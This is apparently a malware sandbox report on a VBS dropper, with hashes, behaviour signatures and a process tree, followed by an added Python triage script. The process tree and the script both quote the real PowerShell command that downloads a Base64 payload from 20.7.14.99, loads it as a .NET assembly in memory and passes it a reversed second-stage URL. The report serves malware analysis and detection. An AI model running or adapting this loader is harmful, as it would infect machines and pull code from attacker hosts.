Analysis
max time kernel: 37s
max time network: 44s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64 arch:x86 image:win7-20220812-en locale:en-us os:windows7-x64 system
submitted: 14-10-2022 18:13
Static task
static1
Behavioral task
behavioral1
Sample
QJSXA02HNVFDSA_002.vbs
Resource
win7-20220812-en
windows7-x64
5 signatures
150 seconds
General
Target: QJSXA02HNVFDSA_002.vbs
Size: 655KB
MD5: b4b5d6de250942a76ddee880ee1e79e3
SHA1: cb510fa59d7ffe89105fccd06b987c69fc1b1481
SHA256: 7fbc145717d92d4d062cee79cef674462553dfe681333bba48ccd32beb97260b
SHA512: 044ed3b0da150486bd45b8484bba90ef094a2ed0ea49162115b59ad5f529633d9f277c9021882d72e2cf672e64afcaad28810170959a0c5490e5c48e97e70a6d
SSDEEP: 768:K1TsI0Sed5dQRXaPlSWPk/LCFeu2ka+VLG0:ugZ2Jcy0
Score
10/10
Malware Config
Extracted
Language: ps1
Deobfuscated
URLs
ps1.dropper: http://20.7.14.99/dll/dll_ink.pdf
Signatures
-
Blocklisted process makes network request (1 IoC)
Processes:
  flow  pid   process
  3     1160  powershell.exe
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox labels this as likely ransomware behaviour, but it is a generic heuristic: this report records no file-encryption or mass file-write activity, so the drive enumeration by itself is not evidence of ransomware.
-
Suspicious behavior: EnumeratesProcesses (1 IoC)
Processes:
  pid   process
  1160  powershell.exe
-
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  1160  powershell.exe
-
Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
  description                       pid   process      target process
  PID 1424 wrote to memory of 1160  1424  WScript.exe  powershell.exe
  PID 1424 wrote to memory of 1160  1424  WScript.exe  powershell.exe
  PID 1424 wrote to memory of 1160  1424  WScript.exe  powershell.exe
Processes
-
1. C:\Windows\System32\WScript.exe (PID 1424)
   "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\QJSXA02HNVFDSA_002.vbs"
   - Suspicious use of WriteProcessMemory
   -
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1160)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('45989365f051-b5b8-e7d4-56eb-42259d7a=nekot&aidem=tla?txt.nysabjK/o/moc.topsppa.0a7e4-32r/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
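The PowerShell command line above is the whole first stage: it fetches a Base64 blob served as a ".pdf", decodes it, loads it as a .NET assembly in memory with AppDomain.Load, and calls Fiber.Home.VAI with a single string argument that is simply written backwards (it ends in "//:sptth", i.e. "https://" reversed). The script below is an added triage example and is not part of the sandbox report or the malware; it copies the recorded command line verbatim, extracts the dropper URL, the loaded type and method, and the reversed argument, flags the WScript.exe -> powershell.exe chain the report shows, and checks whether a fetched "document" is really a Base64-encoded PE. All function names, the SAMPLE_EVENT field names and the CONSTRUCTED_STAGE stub are assumptions made for this example; the real second-stage payload is not included in the report.

```python
"""Triage helpers for the WScript -> PowerShell reflective-loader chain in this report.

Added example (not from the sandbox report). The command line below is copied
from the report's process tree; every function name and the SAMPLE_EVENT field
names are assumptions made for this example.
"""
import base64
import binascii
import re

# PowerShell command line exactly as recorded in the report's process tree.
POWERSHELL_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r"[Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient)"
    r".DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));"
    r"[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home')"
    r".GetMethod('VAI').Invoke($null, [object[]] ('45989365f051-b5b8-e7d4-56eb-42259d7a"
    r"=nekot&aidem=tla?txt.nysabjK/o/moc.topsppa.0a7e4-32r/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))"
)

# Constructed process-creation event modelled on the report's PIDs (field names are assumed).
SAMPLE_EVENT = {
    "parent_pid": 1424,
    "parent_image": r"C:\Windows\System32\WScript.exe",
    "pid": 1160,
    "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "command_line": POWERSHELL_CMDLINE,
}

DOWNLOAD_RE = re.compile(r"\.DownloadString\(\s*'([^']+)'\s*\)", re.I)
LOAD_RE = re.compile(r"\.Load\(\$\w+\)\.GetType\('([^']+)'\)\.GetMethod\('([^']+)'\)", re.I)
ARG_RE = re.compile(r"\.Invoke\(\$null,\s*\[object\[\]\]\s*\('([^']+)'\)\)", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def decode_argument(arg: str) -> str:
    """Undo the string reversal the loader applies to its argument.

    A reversed URL ends in '//:sptth' or '//:ptth' ('https://' / 'http://'
    backwards); reversing it yields the real second-stage URL. Anything else
    is returned unchanged so the caller can tell the two cases apart.
    """
    if arg.endswith(("//:sptth", "//:ptth")):
        return arg[::-1]
    return arg


def extract_iocs(cmdline: str) -> dict:
    """Pull the dropper URL, the loaded type/method and the decoded argument."""
    iocs = {"dropper_url": None, "assembly_type": None, "entry_method": None,
            "raw_argument": None, "decoded_argument": None}
    m = DOWNLOAD_RE.search(cmdline)
    if m:
        iocs["dropper_url"] = m.group(1)
    m = LOAD_RE.search(cmdline)
    if m:
        iocs["assembly_type"], iocs["entry_method"] = m.group(1), m.group(2)
    m = ARG_RE.search(cmdline)
    if m:
        iocs["raw_argument"] = m.group(1)
        iocs["decoded_argument"] = decode_argument(m.group(1))
    return iocs


def triage(event: dict) -> list:
    """Return the reasons a process-creation event matches this loader pattern."""
    reasons = []
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    child = event["image"].lower().rsplit("\\", 1)[-1]
    cmd = event["command_line"]
    if parent in SCRIPT_HOSTS and child == "powershell.exe":
        reasons.append("Windows Script Host spawned powershell.exe")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("Net.WebClient.DownloadString in command line")
    if re.search(r"FromBase64String", cmd, re.I) and \
            re.search(r"AppDomain\]::CurrentDomain\.Load\(", cmd, re.I):
        reasons.append("Base64 blob loaded as .NET assembly via AppDomain.Load")
    return reasons


def is_base64_pe(text: str) -> bool:
    """Check whether a fetched 'document' is really a Base64-encoded PE (starts with MZ)."""
    try:
        blob = base64.b64decode(text.strip(), validate=True)
    except binascii.Error:
        return False
    return blob[:2] == b"MZ"


# Constructed stand-in for the download: a Base64 MZ stub, not the real payload.
CONSTRUCTED_STAGE = base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60).decode()

if __name__ == "__main__":
    for key, value in extract_iocs(POWERSHELL_CMDLINE).items():
        print(f"{key}: {value}")
    print("triage reasons:", triage(SAMPLE_EVENT))
    print("stage looks like PE:", is_base64_pe(CONSTRUCTED_STAGE))
```

Reversing the recorded argument gives an https URL on firebasestorage.googleapis.com pointing at an appspot.com bucket object named Kjbasyn.txt with an alt=media token, which is where the loaded assembly fetches its next stage; both that host and 20.7.14.99 are the IoCs to block. The three triage reasons map directly onto the report's own signatures (script host spawning PowerShell, the blocklisted network request, and the in-memory assembly load), so the same logic can be expressed as a process-creation rule in whatever EDR or SIEM the reader runs.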
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/1160-55-0x0000000000000000-mapping.dmp
- memory/1160-57-0x000007FEF3990000-0x000007FEF43B3000-memory.dmp (Filesize 10.1MB)
- memory/1160-59-0x00000000027A4000-0x00000000027A7000-memory.dmp (Filesize 12KB)
- memory/1160-58-0x000007FEF2E30000-0x000007FEF398D000-memory.dmp (Filesize 11.4MB)
- memory/1160-60-0x000000001B700000-0x000000001B9FF000-memory.dmp (Filesize 3.0MB)
- memory/1160-61-0x00000000027AB000-0x00000000027CA000-memory.dmp (Filesize 124KB)
- memory/1160-62-0x00000000027A4000-0x00000000027A7000-memory.dmp (Filesize 12KB)
- memory/1160-63-0x00000000027AB000-0x00000000027CA000-memory.dmp (Filesize 124KB)
- memory/1424-54-0x000007FEFBD11000-0x000007FEFBD13000-memory.dmp (Filesize 8KB)